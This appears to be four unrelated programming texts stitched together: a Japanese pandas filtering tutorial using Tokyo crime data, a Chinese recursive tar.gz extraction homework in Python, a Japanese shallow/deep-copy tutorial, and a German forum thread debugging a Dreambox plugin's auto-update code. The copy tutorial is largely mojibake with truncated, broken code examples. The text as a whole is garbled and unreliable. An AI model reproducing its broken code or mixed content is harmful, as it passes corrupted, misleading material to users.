のようにするが、今回のように文字列の関数を使うときは str.endswith を用いる。
ちなみにもとの csv データは東京都の犯罪発生件数である。
市区町丁 総合計 凶悪犯計 凶悪犯強盗 凶悪犯その他千代田区神田練塀町 17 0 0 0千代田区神田相生町 13 0 0 0千代田区計 3204 11 8 3中央区銀座1丁目 66 1 1 0
千代田区計という行に注目してほしい。「計」という言葉で終わっている。
千代田区計 3204 11 8 3
千代田区という言葉から始まる市区町丁を検索するときは startswith を使う。
import pandas as pd
df = pd.read_csv('H30.csv', encoding='SHIFT-JIS')
rows = df.loc[df['市区町丁'].str.startswith('千代田区')]
print(rows)
結果はこうなる。
市区町丁 総合計 凶悪犯計 凶悪犯強盗 ... その他占有離脱物横領 その他その他知能犯 その他賭博 その他その他刑法犯0 千代田区丸の内1丁目 639 3 3 ... 6 18 0 311 千代田区丸の内2丁目 53 0 0 ... 1 3 0 62 千代田区丸の内3丁目 68 1 1 ... 1 2 0 63 千代田区大手町1丁目 58 0 0 ... 3 1 0 74 千代田区大手町2丁目 23 0 0 ... 1 0 0 35 千代田区内幸町1丁目 26 1 0 ... 2 0 0 36 千代田区内幸町2丁目 17 0 0 ... 0 0 0 17 千代田区有楽町1丁目 121 0 0 ... 1 0 0 58 千代田区有楽町2丁目 167 0 0 ... 2 1 0 79 千代田区霞が関1丁目 24 0 0 ... 0 2 0 610 千代田区霞が関2丁目 10 0 0 ... 0 0 0 311 千代田区霞が関3丁目 7 0 0 ... 1 1 0 012 千代田区永田町1丁目 21 0 0 ... 0 0 0 813 千代田区永田町2丁目 26 0 0 ... 0 0 0 414 千代田区隼町 1 0 0 ... 0 0 0 115 千代田区平河町1丁目 10 0 0 ... 0 0 0 016 千代田区平河町2丁目 8 0 0 ... 0 1 0 017 千代田区麹町1丁目 18 1 0 ... 1 0 0 318 千代田区麹町2丁目 3 0 0 ... 0 0 0 219 千代田区麹町3丁目 6 0 0 ... 0 0 0 220 千代田区麹町4丁目 14 0 0 ... 1 0 0 121 千代田区麹町5丁目 4 1 1 ... 0 0 0 122 千代田区麹町6丁目 10 0 0 ... 0 1 0 223 千代田区紀尾井町 28 0 0 ... 0 0 0 124 千代田区一番町 8 0 0 ... 0 0 0 225 千代田区二番町 6 0 0 ... 1 0 0 126 千代田区三番町 9 0 0 ... 0 0 0 127 千代田区四番町 3 0 0 ... 0 0 0 028 千代田区五番町 20 0 0 ... 2 0 0 129 千代田区六番町 13 0 0 ... 1 1 0 3.. ... ... ... ... ... ... ... ... ...83 千代田区外神田5丁目 9 0 0 ... 1 0 0 084 千代田区外神田6丁目 23 0 0 ... 1 0 0 185 千代田区鍛冶町1丁目 23 0 0 ... 1 0 0 386 千代田区鍛冶町2丁目 84 0 0 ... 5 0 0 687 千代田区神田鍛冶町3丁目 16 0 0 ... 0 0 0 088 千代田区神田紺屋町 6 0 0 ... 0 0 0 189 千代田区神田北乗物町 1 0 0 ... 0 0 0 190 千代田区神田富山町 4 0 0 ... 0 0 0 291 千代田区神田美倉町 2 0 0 ... 0 0 0 092 千代田区岩本町1丁目 6 0 0 ... 0 0 0 293 千代田区岩本町2丁目 19 0 0 ... 1 0 0 294 千代田区岩本町3丁目 15 0 0 ... 2 1 0 095 千代田区神田西福田町 2 0 0 ... 0 0 0 196 千代田区神田東松下町 2 0 0 ... 0 0 0 097 千代田区神田岩本町 13 0 0 ... 3 0 0 098 千代田区東神田1丁目 16 0 0 ... 2 0 0 199 千代田区東神田2丁目 15 0 0 ... 1 0 0 3100 千代田区東神田3丁目 2 0 0 ... 0 0 0 0101 千代田区神田和泉町 9 0 0 ... 1 0 0 0102 千代田区神田佐久間町1丁目 71 0 0 ... 3 0 0 6103 千代田区神田佐久間町2丁目 11 0 0 ... 1 0 0 1104 千代田区神田佐久間町3丁目 16 1 1 ... 0 0 0 1105 千代田区神田佐久間町4丁目 3 0 0 ... 0 0 0 1106 千代田区神田平河町 4 0 0 ... 1 0 0 0107 千代田区神田松永町 17 0 0 ... 2 0 0 5108 千代田区神田花岡町 42 0 0 ... 2 0 0 2109 千代田区神田佐久間河岸 2 0 0 ... 0 0 0 0110 千代田区神田練塀町 17 0 0 ... 2 2 0 2111 千代田区神田相生町 13 0 0 ... 0 0 0 1112 千代田区計 3204 11 8 ... 105 50 0 298
|
文章目录
背景
本题目想实现递归解压并对压缩包内的数字求和。 本题目来自中国科学院大学,算法概论课后作业02 源文件 。
Exercise (2).
定义文件xx.tar.gz 的产生方式如下: - 以xx 为文件名的文件通过tar 和gzip 打包压缩产生,该文件中以字符串的方式记录了一个非负整数; - 或者以xx 为名的目录通过tar 和gzip 打包压缩产生,该目录中包含若干xx.tar.gz。其中,x 2 [0, 9]。
现给定一个根据上述定义生成的文件00.tar.gz (该文件从课程网站下载),请确定其中包含的以xx 为文件名的文件个数以及这些文件中所记录的非负整数之和。
> 00.tar.gz 下载链接:https://download.csdn.net/download/still_night/10820211
代码实现(Python)
import os,tarfile
def unpack_path_file(pathname):
archive = tarfile.open(pathname, 'r:gz')
path=os.path.split(os.path.abspath(pathname))[0]
f,n=0,0 # 设置文件数和加和为0
for tarinfo in archive:
archive.extract(tarinfo, path) # 解压压缩文件中的一个文件
name=tarinfo.name # 解压的文件名
tfname=os.path.join(path,tarinfo.name) # 解压后的文件路径
if tarinfo.isfile(): # 如果是文件 存在待解压文件是.的情况 表示当前压缩文件
if tarinfo.name.rfind(".tar.gz")!=-1: # 如果也是压缩文件,则递归解压它
f1,n1=unpack_path_file(tfname)
f+=f1
n+=n1
# 把调用函数的文件数量和数字和加上来
else: # 如果不是压缩文件,则是数据文件,里面含有非负整数
f+=1 # 文件数量加1
with open(tfname) as fp: # 读出来这个非负整数并加到n上
n+=int(fp.read())
archive.close() # 关闭这个压缩文件
return f,n # 返回给上一级文件数量和加和
# 调用函数开始解压
unpack_path_file("00.tar.gz")
结果
文件数:3170
加和:15752491
|
Pythonãªãã¸ã§ã¯ãã®æµ ãã³ãã¼ã¨ãã£ã¼ãã³ãã¼
ãªãã¸ã§ã¯ãã®https://realpython.com/python-variables/#variable-assignment[Pythonã®å²ãå½ã¦ã¹ãã¼ãã¡ã³ãã¯ã³ãã¼ã使ãã¾ãã]ãååã®ã¿ããªãã¸ã§ã¯ãã«ãã¤ã³ããã¾ãã ä¸å¤ãªãã¸ã§ã¯ãã®å ´åãé常ã¯éãã¯ããã¾ããã
ããããå¯å¤ãªãã¸ã§ã¯ãã¾ãã¯å¯å¤ãªãã¸ã§ã¯ãã®ã³ã¬ã¯ã·ã§ã³ãæä½ããã«ã¯ããããã®ãªãã¸ã§ã¯ãã®ãå®éã®ã³ãã¼ãã¾ãã¯ãã¯ãã¼ã³ãã使ããæ¹æ³ãæ¢ãã¦ããããããã¾ããã
åºæ¬çã«ãæã«ã¯ãªãªã¸ãã«ãèªåçã«ä¿®æ£ãããã¨ãªãä¿®æ£ã§ããã³ãã¼ãå¿ è¦ã«ãªããã¨ãããã¾ãã ãã®è¨äºã§ã¯ãPython 3ã§ãªãã¸ã§ã¯ããã³ãã¼ã¾ãã¯ãã¯ãã¼ã³ãããæ¹æ³ã®æ¦è¦ã¨ãããã¤ãã®æ³¨æäºé ã説æãã¾ãã
_ *注æï¼*ãã®ãã¥ã¼ããªã¢ã«ã¯Python 3ã念é ã«ç½®ãã¦æ¸ããã¦ãã¾ããããªãã¸ã§ã¯ãã®ã³ãã¼ã«é¢ãã¦ã¯Python 2ã¨3ã«ã»ã¨ãã©éãã¯ããã¾ããã éããããå ´åã¯ãæ¬æã§ããããææãã¾ãã _
Pythonã®çµã¿è¾¼ã¿ã³ã¬ã¯ã·ã§ã³ãã³ãã¼ããæ¹æ³ãè¦ã¦ã¿ã¾ãããã listsãdictsãsetsã®ãããªPythonã®çµã¿è¾¼ã¿ã®å¯å¤ã³ã¬ã¯ã·ã§ã³ã¯ãæ¢åã®ã³ã¬ã¯ã·ã§ã³ã§ãã¡ã¯ããªé¢æ°ãå¼ã³åºããã¨ã§ã³ãã¼ã§ãã¾ãã
new_list = list(original_list)
new_dict = dict(original_dict)
new_set = set(original_set)
ãã ãããã®ã¡ã½ããã¯ã«ã¹ã¿ã ãªãã¸ã§ã¯ãã§ã¯æ©è½ããããã®ä¸ã_shallowã³ãã¼_ã®ã¿ã使ãã¾ãã ãªã¹ããè¾æ¸ãã»ãããªã©ã®è¤åãªãã¸ã§ã¯ãã®å ´åã_shallow_ã¨_deep_ã®ã³ãã¼ã«ã¯éè¦ãªéããããã¾ãã
*æµ ãã³ãã¼*ã¯ãæ°ããã³ã¬ã¯ã·ã§ã³ãªãã¸ã§ã¯ãã使ããå ã®ã³ã¬ã¯ã·ã§ã³ãªãã¸ã§ã¯ãã«ããåãªãã¸ã§ã¯ãã¸ã®åç §ããã®ã³ã¬ã¯ã·ã§ã³ãªãã¸ã§ã¯ãã«è¿½å ãããã¨ãæå³ãã¾ãã æ¬è³ªçã«ãæµ ãã³ãã¼ã¯_1ã¬ãã«ã®æ·±ã_ã§ãã ã³ãã¼ããã»ã¹ã¯å帰ããªããããåãªãã¸ã§ã¯ãèªä½ã®ã³ãã¼ã¯ä½æããã¾ããã
*ãã£ã¼ãã³ãã¼*ã¯ãã³ãã¼ããã»ã¹ãå帰çã«ãã¾ãã æåã«æ°ããã³ã¬ã¯ã·ã§ã³ãªãã¸ã§ã¯ããæ§ç¯ãã¦ãããå ã®ã³ã¬ã¯ã·ã§ã³ãªãã¸ã§ã¯ãã§è¦ã¤ãã£ãåãªãã¸ã§ã¯ãã®ã³ãã¼ãå帰çã«æ ¼ç´ãããã¨ãæå³ãã¾ãã ãã®æ¹æ³ã§ãªãã¸ã§ã¯ããã³ãã¼ããã¨ããªãã¸ã§ã¯ãããªã¼å ¨ä½ããã©ã£ã¦ãå ã®ãªãã¸ã§ã¯ãã¨ãã®ãã¹ã¦ã®åã®å®å ¨ã«ç¬ç«ããã¯ãã¼ã³ã使ãã¾ãã
ã¡ãã£ã¨ä¸å£ã§ããã ãã£ã¼ãã³ãã¼ã¨ã·ã£ãã¼ã³ãã¼ã®éããçè§£ããããã®ä¾ãããã¤ãè¦ã¦ã¿ã¾ãããã
*ç¡æãã¼ãã¹ï¼*ãªã³ã¯ï¼[Python Tricksï¼The Book]ã®ç« ã«ã¢ã¯ã»ã¹ããã«ã¯ããããã¯ãªãã¯ãã¦ãPythonã®ãã¹ããã©ã¯ãã£ã¹ãç°¡åãªä¾ã¨ã¨ãã«ç¤ºãã¾ããããã«é©ç¨ãã¦ãããç¾ãã+ Pythonã³ã¼ããè¨è¿°ã§ãã¾ãã
æµ ãã³ãã¼ã®ä½æ
以ä¸ã®ä¾ã§ã¯ãæ°ãããã¹ãããããªã¹ãã使ãã `+ listï¼ï¼+`ãã¡ã¯ããªã¼é¢æ°ã§_shallowly_ã³ãã¼ãã¾ãï¼
>>>
>>> xs = [[ys = list(xs) # Make a shallow copy
ããã¯ãã+ ys ããã xs +ãã¨åãå å®¹ã®æ°ããç¬ç«ãããªãã¸ã§ã¯ãã«ãªããã¨ãæå³ãã¾ãã ããã確èªããã«ã¯ã両æ¹ã®ãªãã¸ã§ã¯ãã調ã¹ã¾ãã
>>>
>>> xs
[[ys
[[To confirm `+ys+` really is independent from the original, let’s devise a little experiment. You could try and add a new sublist to the original (`+xs+`) and then check to make sure this modification didn’t affect the copy (`+ys+`):
[.repl-toggle]#>>>#
[source,python,repl]
>>> xs.appendï¼['new sublist']ï¼>>> xs [[new sublist']] >>> ys [[ã覧ã®éããããã¯æå¾ ãã广ãããã¾ããã ã³ãã¼ãããªã¹ããã表é¢çãªãã¬ãã«ã§å¤æ´ãã¦ããã¾ã£ããåé¡ããã¾ããã§ããã
ãã ããå ã®ãªã¹ãã®_shallow_ã³ãã¼ã®ã¿ã使ãããããã+ ys ãã«ã¯ã xs +ãã«ä¿åããã¦ããå ã®åãªãã¸ã§ã¯ãã¸ã®åç §ãå«ã¾ãã¦ãã¾ãã
ãããã®åã¯ã³ãã¼ããã¾ããã§ããã ãããã¯ã³ãã¼ããããªã¹ãã§åã³åç §ãããã ãã§ãã
ãããã£ã¦ã `+ xs `ã®åãªãã¸ã§ã¯ãã®1ã¤ã夿´ããã¨ããã®å¤æ´ã¯ ` ys +`ã«ãåæ ããã¾ããããã¯ã_両æ¹ã®ãªã¹ããåãåãªãã¸ã§ã¯ã_ãå ±æãã¦ããããã§ãã ã³ãã¼ã¯ã1ã¬ãã«ã®æµ ãã³ãã¼ã®ã¿ã§ãã
>>>
>>> xs[1][0] = 'X'>>> xs[[X', 5, 6], [7, 8, 9], ['new sublist']]>>> ys[[X', 5, 6], [7, 8, 9]]
ä¸è¨ã®ä¾ã§ã¯ï¼ä¸è¦ï¼ `+ xs `ã«å¤æ´ãå ããã ãã§ãã ãããã ` xs `ã®ã¤ã³ããã¯ã¹1ã®_both_ãµããªã¹ã_and_ ` ys +`ã夿´ããããã¨ããããã¾ãã ç¹°ãè¿ãã¾ãããããã¯å ã®ãªã¹ãã®_shallow_ã³ãã¼ã®ã¿ã使ããããã«çºçãã¾ããã
æåã®ã¹ãããã§ã+ xs +ãã®_deep_ã³ãã¼ã使ãã¦ããå ´åã両æ¹ã®ãªãã¸ã§ã¯ãã¯å®å ¨ã«ç¬ç«ãã¦ãã¾ãã ããã¯ããªãã¸ã§ã¯ãã®æµ ãã³ãã¼ã¨æ·±ãã³ãã¼ã®å®éã®éãã§ãã
ããã§ãçµã¿è¾¼ã¿ã³ã¬ã¯ã·ã§ã³ã¯ã©ã¹ã®ä¸é¨ã®æµ ãã³ãã¼ã使ããæ¹æ³ãããããæµ ãã³ãã¼ã¨æ·±ãã³ãã¼ã®éãããããã¾ããã ã¾ã åçãå¿ è¦ãªè³ªåã¯æ¬¡ã®ã¨ããã§ãã
ãã«ãã¤ã³ã³ã¬ã¯ã·ã§ã³ã®ãã£ã¼ãã³ãã¼ã使ããã«ã¯ã©ãããã°ããã§ããï¼
ã«ã¹ã¿ã ã¯ã©ã¹ãå«ãä»»æã®ãªãã¸ã§ã¯ãã®ã³ãã¼ï¼æµ ããã®ã¨æ·±ããã®ï¼ã使ããã«ã¯ã©ãããã°ããã§ããï¼
ãããã®è³ªåã«å¯¾ããçãã¯ãPythonæ¨æºã©ã¤ãã©ãªã® `+ copy +`ã¢ã¸ã¥ã¼ã«ã«ããã¾ãã ãã®ã¢ã¸ã¥ã¼ã«ã¯ãä»»æã®Pythonãªãã¸ã§ã¯ãã®æµ ãã³ãã¼ã¨æ·±ãã³ãã¼ã使ããããã®ã·ã³ãã«ãªã¤ã³ã¿ã¼ãã§ã¼ã¹ãæä¾ãã¾ãã
ãã£ã¼ãã³ãã¼ã®ä½æ
åã®ãªã¹ãã³ãã¼ã®ä¾ãç¹°ãè¿ãã¾ããã1ã¤ã®éè¦ãªéããããã¾ãã ä»åã¯ã代ããã« `+ copy `ã¢ã¸ã¥ã¼ã«ã§å®ç¾©ããã ` deepcopyï¼ï¼+`颿°ã使ç¨ãã¦_deep_ã³ãã¼ã使ãã¾ãã
>>>
>>> import copy
>>> xs = [[zs = copy.deepcopy(xs)
`+ copy.deepcopyï¼ï¼`ã§ä½æãã ` xs `ã¨ãã®ã¯ãã¼ã³ ` zs +`ã調ã¹ãã¨ãåã®ä¾ã®ããã«ä¸¡æ¹ãåãã«è¦ãããã¨ããããã¾ãã
>>>
>>> xs
[[zs
[[However, if you make a modification to one of the child objects in the original object (`+xs+`), you’ll see that this modification won’t affect the deep copy (`+zs+`).
Both objects, the original and the copy, are fully independent this time. `+xs+` was cloned recursively, including all of its child objects:
[.repl-toggle]#>>>#
[source,python,repl]
>>> xs [1] [0] = 'X' >>> xs [[X', 5, 6], [7, 8, 9]] >>> zs [[Pythonã¤ã³ã¿ããªã¿ã¨ä¸ç·ã«åº§ã£ã¦ãããã®ä¾ãä»ããåçããã®ã«å°ãæéããããããããã¾ããã ãªãã¸ã§ã¯ããã³ãã¼ãã¦é ãå ã¿è¾¼ãã®ã¯ããµã³ãã«ãå®éã«ä½é¨ãã¦éãã§ã¿ãã¨ç°¡åã§ãã
ã¨ããã§ã `+ copy `ã¢ã¸ã¥ã¼ã«ã®é¢æ°ã使ç¨ãã¦æµ ãã³ãã¼ã使ãããã¨ãã§ãã¾ãã ` copy.copyï¼ï¼+`颿°ã¯ãªãã¸ã§ã¯ãã®æµ ãã³ãã¼ã使ãã¾ãã
ããã¯ãã³ã¼ãã®ã©ããã«æµ ãã³ãã¼ã使ãã¦ãããã¨ãæç¢ºã«ä¼ããå¿ è¦ãããå ´åã«å½¹ç«ã¡ã¾ãã `+ copy.copyï¼ï¼+`ã使ç¨ããã¨ããã®äºå®ã示ããã¨ãã§ãã¾ãã ãã ãããã«ãã¤ã³ã³ã¬ã¯ã·ã§ã³ã®å ´åããªã¹ãããã£ã¯ãã¼ã·ã§ã³ãããã³ãã¡ã¯ããªé¢æ°ã®ã»ããã使ç¨ãã¦æµ ãã³ãã¼ã使ããæ¹ããããPythonicã¨è¦ãªããã¾ãã
ä»»æã®Pythonãªãã¸ã§ã¯ãã®ã³ãã¼
ã¾ã çããå¿ è¦ãªè³ªåã¯ãã«ã¹ã¿ã ã¯ã©ã¹ãå«ãä»»æã®ãªãã¸ã§ã¯ãã®ã³ãã¼ï¼æµ ãæ·±ãï¼ãã©ã®ããã«ä½æãããã§ãã ä»ãããè¦ã¦ã¿ã¾ãããã
ç¹°ãè¿ãã«ãªãã¾ããã `+ copy `ã¢ã¸ã¥ã¼ã«ãå½¹ã«ç«ã¡ã¾ãã ãã® ` copy.copyï¼ï¼`ããã³ ` copy.deepcopyï¼ï¼+`颿°ã¯ãä»»æã®ãªãã¸ã§ã¯ããè¤è£½ããããã«ä½¿ç¨ã§ãã¾ãã
ç¹°ãè¿ãã¾ããããããã®ä½¿ç¨æ¹æ³ãçè§£ããæè¯ã®æ¹æ³ã¯ãç°¡åãªå®é¨ãè¡ããã¨ã§ãã ããã¯ãåã®ãªã¹ãã³ãã¼ã®ä¾ã«åºã¥ãã¦è¡ãã¾ãã ç°¡åãª2Dãã¤ã³ãã¯ã©ã¹ãå®ç¾©ãããã¨ããå§ãã¾ãããã
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def __repr__(self):
return f'Point({self.x!r}, {self.y!r})'
ãããé常ã«ç°¡åã ã£ããã¨ã«åæãã¦ããã ããã°å¹¸ãã§ãã Pythonã¤ã³ã¿ã¼ããªã¿ã¼ã§ãã®ã¯ã©ã¹ãã使ããããªãã¸ã§ã¯ããç°¡åã«æ¤æ»ã§ããããã«ã `+ repr ï¼ï¼+`å®è£
ã追å ãã¾ããã
_ *注æï¼*ä¸è¨ã®ä¾ã§ã¯ãhttps://dbader.org/blog/python-string-formatting [Python 3.6 f-string]ã使ç¨ãã¦ã `+ repr _ +`ã«ãã£ã¦è¿ãããæååã使ãã¾ãã Python 2ããã³3.6ããåã®Python 3ã®ãã¼ã¸ã§ã³ã§ã¯ããã¨ãã°æ¬¡ã®ãããªç°ãªãæååãã©ã¼ãããå¼ã使ç¨ãã¾ãã
def __repr__(self):
return 'Point(%r, %r)' % (self.x, self.y)
_ _
次ã«ã `+ Point `ã¤ã³ã¹ã¿ã³ã¹ã使ãã ` copy +`ã¢ã¸ã¥ã¼ã«ã使ç¨ãã¦ï¼æµ ãï¼ã³ãã¼ãã¾ãï¼
>>>
>>> a = Point(23, 42)
>>> b = copy.copy(a)
å ã® `+ Point +`ãªãã¸ã§ã¯ãã¨ãã®ï¼æµ ãï¼ã¯ãã¼ã³ã®å 容ã調ã¹ãã¨ãäºæ³ããããã®ããããã¾ãã
>>>
>>> a
Point(23, 42)
>>> b
Point(23, 42)
>>> a is b
False
ããã§çæãã¹ããã¨ã¯ä»ã«ãããã¾ãã ãã¤ã³ããªãã¸ã§ã¯ãã¯ãã®åº§æ¨ã«ä¸å¤ã®åï¼intï¼ã使ç¨ããããããã®å ´åãæµ ãã³ãã¼ã¨æ·±ãã³ãã¼ã®éã«éãã¯ããã¾ããã ããããç§ã¯ããã«ä¾ãæ¡å¼µãã¾ãã
ããã«è¤éãªä¾ã«ç§»ãã¾ãããã 2Dé·æ¹å½¢ã表ãå¥ã®ã¯ã©ã¹ãå®ç¾©ãã¾ãã ããè¤éãªãªãã¸ã§ã¯ãé層ã使ã§ããããã«ãããè¡ãã¾ããç§ã®é·æ¹å½¢ã¯ `+ Point +`ãªãã¸ã§ã¯ãã使ç¨ãã¦åº§æ¨ã表ãã¾ãã
class Rectangle:
def __init__(self, topleft, bottomright):
self.topleft = topleft
self.bottomright = bottomright
def __repr__(self):
return (f'Rectangle({self.topleft!r}, '
f'{self.bottomright!r})')
ç¹°ãè¿ãã¾ãããã¾ããåè§å½¢ã¤ã³ã¹ã¿ã³ã¹ã®æµ ãã³ãã¼ã使ãããã¨ãã¾ãã
rect = Rectangle(Point(0, 1), Point(5, 6))
srect = copy.copy(rect)
å
ã®é·æ¹å½¢ã¨ãã®ã³ãã¼ã調ã¹ãã¨ã `+ repr ï¼ï¼+`ãªã¼ãã¼ã©ã¤ãããã¾ãæ©è½ããã·ã£ãã¼ã³ãã¼ããã»ã¹ãæå¾
ã©ããã«æ©è½ãããã¨ããããã¾ãã
>>>
>>> rect
Rectangle(Point(0, 1), Point(5, 6))
>>> srect
Rectangle(Point(0, 1), Point(5, 6))
>>> rect is srect
False
åã®ãªã¹ãã®ä¾ããã£ã¼ãã³ãã¼ã¨ã·ã£ãã¼ã³ãã¼ã®éããã©ã®ããã«ç¤ºãã¦ãããè¦ãã¦ãã¾ããï¼ ããã§ãåãã¢ããã¼ãã使ç¨ãã¾ãã ãªãã¸ã§ã¯ãããªãã¸ã§ã¯ãé層ã®ããæ·±ãã¨ããã§å¤æ´ããã¨ããã®å¤æ´ãï¼æµ ãï¼ã³ãã¼ã«ãåæ ããã¾ãï¼
>>>
>>> rect.topleft.x = 999
>>> rect
Rectangle(Point(999, 1), Point(5, 6))
>>> srect
Rectangle(Point(999, 1), Point(5, 6))
ãããããªããæå¾ ããã¨ããã«åä½ãããã¨ãé¡ã£ã¦ãã¾ãã æ¬¡ã«ãå ã®åè§å½¢ã®ãã£ã¼ãã³ãã¼ã使ãã¾ãã ãã®å¾ãå¥ã®å¤æ´ãé©ç¨ããå½±é¿ãåãããªãã¸ã§ã¯ãã確èªãã¾ãã
>>>
>>> drect = copy.deepcopy(srect)
>>> drect.topleft.x = 222
>>> drect
Rectangle(Point(222, 1), Point(5, 6))
>>> rect
Rectangle(Point(999, 1), Point(5, 6))
>>> srect
Rectangle(Point(999, 1), Point(5, 6))
ã»ãï¼ ä»åã¯ããã£ã¼ãã³ãã¼ï¼ + drect +ï¼ã¯ãªãªã¸ãã«ï¼ + rect +ï¼ããã³ã·ã£ãã¼ã³ãã¼ï¼ + srect +ï¼ããå®å
¨ã«ç¬ç«ãã¦ãã¾ãã
ããã§ã¯å¤ãã®ãã¨ã説æãã¾ãããããªãã¸ã§ã¯ãã®ã³ãã¼ã«ã¯ããã«ç´°ãããã¤ã³ããããã¾ãã
ãã®ãããã¯ãæ·±ãæãä¸ããï¼haï¼ï¼ãã¨ã¯æçã§ãããã®ãããhttps://docs.python.org/3/library/copy.html [`+ copy `ã¢ã¸ã¥ã¼ã«ããã¥ã¡ã³ã]ã調ã¹ã¦ãã ããã ãã¨ãã°ããªãã¸ã§ã¯ãã§ç¹æ®ãªã¡ã½ãã ` copy ï¼ï¼`㨠` deepcopy ï¼ï¼+`ãå®ç¾©ãããã¨ã§ããªãã¸ã§ã¯ãã®ã³ãã¼æ¹æ³ãå¶å¾¡ã§ãã¾ãã
è¦ãã¦ããã¹ã3ã¤ã®ãã¨
ãªãã¸ã§ã¯ãã®æµ ãã³ãã¼ã使ãã¦ããåãªãã¸ã§ã¯ãã¯è¤è£½ããã¾ããã ãããã£ã¦ãã³ãã¼ã¯å ã®ã³ãã¼ããå®å ¨ã«ç¬ç«ãã¦ããããã§ã¯ããã¾ããã
ãªãã¸ã§ã¯ãã®ãã£ã¼ãã³ãã¼ã¯ãåãªãã¸ã§ã¯ããå帰çã«è¤è£½ãã¾ãã ã¯ãã¼ã³ã¯ãªãªã¸ãã«ããå®å ¨ã«ç¬ç«ãã¦ãã¾ããããã£ã¼ãã³ãã¼ã®ä½æã¯é ããªãã¾ãã
`+ copy +`ã¢ã¸ã¥ã¼ã«ã§ä»»æã®ãªãã¸ã§ã¯ãï¼ã«ã¹ã¿ã ã¯ã©ã¹ãå«ãï¼ãã³ãã¼ã§ãã¾ãã
ä»ã®ä¸ç´ã¬ãã«ã®Pythonããã°ã©ãã³ã°ææ³ãããã«è©³ããç¥ãããå ´åã¯ã次ã®ç¡æãã¼ãã¹ãã覧ãã ããã
*ç¡æãã¼ãã¹ï¼*ãªã³ã¯ï¼[Python Tricksï¼The Book]ã®ç« ã«ã¢ã¯ã»ã¹ããã«ã¯ããããã¯ãªãã¯ãã¦ãPythonã®ãã¹ããã©ã¯ãã£ã¹ãç°¡åãªä¾ã¨ã¨ãã«ç¤ºãã¾ããããã«é©ç¨ãã¦ãããç¾ãã+ Pythonã³ã¼ããè¨è¿°ã§ãã¾ãã
|
Gerade eingecheckt im github
Perfekt, super, danke.
Gleich mal austesten.
Erstmal ein dickes Lob an die Programmierer! Spitzeneinsatz und tolles Ergebnis!!
Jetzt wäre ich noch neugierig wie es dem Proxy so geht. Hat er gut zu tun oder schafft er das bisher ganz locker?
Grüße, rdanton.
Guten Abend allerseits,
auch von meiner Seite ein ganz großes Lob an die Programmierer und den Einsatz bei der "Zusammenarbeit" mit wunschliste.de. Auf meiner 8K (mit Merlin-Image und Zombi-Skin) hat das Update auf die Version 3.2 einwandfrei geklappt. Bei meiner 7080er (mit Merlin-Image und -Skin) bleibt das Update bei "Starte Update, bitte warten..." hängen, und es hilft nur noch der Hauptschalter an der Rückseite. Kann das mit dem Skin zusammenhängen? D.h. ist der Merlin-Skin für die neue SR-Version nicht mehr geeignet? Mit der Vorgängerversion hatte mit diesem Skin alles funktioniert.
Könntet Ihr dann bitte auch nochmal angeben, wie das mit dem Spenden genau funktioniert.
Gruß,
Boxxxfan
Ich musste die dm7080 bisher
immervon Hand updaten.
Da der SR im merlin4-skin nicht geskinnt ist, hat der auch keinen Einfluss.
Ich hab hier keine Probleme auf der 7080, mit dem merlin4-skin.
Stimmt, eigentlich ist es das erste Update seit ich das Plugin auf der 7080 installiert habe. Na dann werd´ ich das auch mal "manuell" updaten. Lässt sich da die neue Version dann einfach über die alte drüber installieren?
Dem Link zur Beta im ersten Posting folgen, zip entpacken und die Dateien auf der Box überschreiben.
Neustart > fertig
Es gibt zwar nicht besonders viele DM7080HD (bzw. richtigerweise DreamOS) Nutzer, im Moment denke sind es 70 Downloads - aber vielleicht kann sich ja mal jemand der sich damit auskennt ansehen was beim Auto-Update schief läuft. Ich habe leider keine passende Box (bei den IPKs gibt es keine Probleme) um das zu testen und zu debuggen. Ansonsten wäre es vielleicht besser die Auto-Update Funktion für die DEBs zu deaktvieren und stattdessen einen Hinweistext zu bringen, dass eine neue Version verfügbar ist. Ist ja doof, wenn sie Box aufhängt und nur über den Netzschalter wiederbelebt werden kann.
Wenn Du mir sagst, wo ich ansetzen kann, um das zu debuggen, könnte ich das gerne mal probieren.
Also sag mir einfach, in welcher py das autoupdate in welchen Zeilen liegt, dann baue ich mal ein wenig debug- Ausgaben ein und probiere das mal rauszufinden...
Netzschalter ist übrigens nicht nötig, ein systemctl stop enigma2 und anschliessendes systemctl start enigma2 via telnet tuts auch...
Vielen Dank für dein Angebot - da unterstütze ich dich gerne.
Seit der Version 3.2 ist der ganze Auto-Update Code in ein extra Modul "SerienRecorderUpdateScreen.py" gewandert.
Wenn ich das richtig verstanden habe, dann klappt der Download von github in den /tmp Ordner der Box (das hat mal jemand im alten SR Thread geschrieben)- aber vielleicht sollte man das noch mal überprüfen, nicht dass das DEB dann nicht komplett ist - oder so.
Das Installieren passiert in Zeile 201 - vielleicht ist der Befehl einfach nicht richtig oder es fehlt noch was. Ich hatte die Reihenfolge zwar jetzt schon mal geändert, aber diese Änderung greift ja erst wenn jemand von der 3.2 auf eine neue Version aktualisiert - und das ist ja bisher noch nicht geschehen. Evtl. hat sich das Problem ja damit schon erledigt.
Liest einfall hier? Habe ihm eine PM geschickt, damit er mir mal seinen Amazon-Wunschliste-Link schickt.
Bisher keine Antwort.
Habe eben SR auf meiner 7020HD eingerichtet und die Config.backup meiner 7080 verwendet. Dort habe ich als Logdateipfad /data/log/ angegeben.
Auf der 7020HD fehlte das Verzeichnis, und es gab nen Grünen. Kann ma das abfangen?
Crashlog anbei.
Der Befehl in Zeile 201 sieht gut aus. Wenn self.filename dann /tmp/sr.deb ist, müsste dass eigentlich funktionieren. Die Reihenfolge ist so jedenfalls richtig. Erst Update, dann installieren, dann Abhängigkeiten auflösen.
ja, habe das gerade schon selbst gefunden. Ich baue gerade debug- output an allen nötigen Stellen ein, und schaue mal, wo es hängen bleibt.
OK, ich habs gefunden: nicht nur der eTimer wurde im dreamOs geändert, sondern auch der eAppContainer. So sieht Deine Zeile aus:
Code
self.container.appClosed.append(self.finishedPluginUpdate)
self.container.stdoutAvail.append(self.srlog)
if isDreamboxOS:
self.container.execute("apt-get update && dpkg -i %s && apt-get -f install" % str(self.file_name))
else:
self.container.execute("opkg install --force-overwrite --force-depends --force-downgrade %s" % str(self.file_name))
und in dreamos wird aus self.container.appClosed.append(self.finishedPluginUpdate)
die Zeile self.appClosed_conn = self.container.appClosed.connect(self.finishedPluginUpdate)
Das heisst, mit ein wenig Debug- Code meinerseits sieht das dann so aus:
Code
if isDreamboxOS:
self.appClosed_conn = self.container.appClosed.connect(self.finishedPluginUpdate)
